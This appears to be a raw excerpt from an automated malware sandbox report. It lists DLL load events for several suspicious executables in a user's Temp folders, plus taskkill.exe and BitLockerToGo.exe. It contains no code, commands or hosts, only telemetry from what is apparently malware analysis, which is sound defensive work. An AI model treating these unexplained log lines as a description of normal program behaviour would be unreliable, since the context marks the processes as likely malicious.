Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004149001\freecam.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004149001\freecam.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004149001\freecam.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004149001\freecam.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004149001\freecam.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: windows.shell.servicehostbuilder.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004156001\2f0cb7128a.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1004156001\2f0cb7128a.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1004156001\2f0cb7128a.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1004156001\2f0cb7128a.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1004156001\2f0cb7128a.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1004156001\2f0cb7128a.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1004156001\2f0cb7128a.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1004156001\2f0cb7128a.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1004156001\2f0cb7128a.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1004156001\2f0cb7128a.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1004156001\2f0cb7128a.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: winhttp.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: webio.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: mswsock.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: winnsi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: sspicli.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: dnsapi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: schannel.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ntasn1.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ncrypt.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: msasn1.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: cryptsp.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: rsaenh.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: cryptbase.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: gpapi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: uxtheme.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: dpapi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: amsi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: userenv.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: profapi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: version.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1004157001\a8e43ec2b6.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1004157001\a8e43ec2b6.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1004157001\a8e43ec2b6.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1004157001\a8e43ec2b6.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1004157001\a8e43ec2b6.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1004157001\a8e43ec2b6.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1004157001\a8e43ec2b6.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1004157001\a8e43ec2b6.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1004157001\a8e43ec2b6.exe	Section loaded: ucrtbase_clr0400.dll
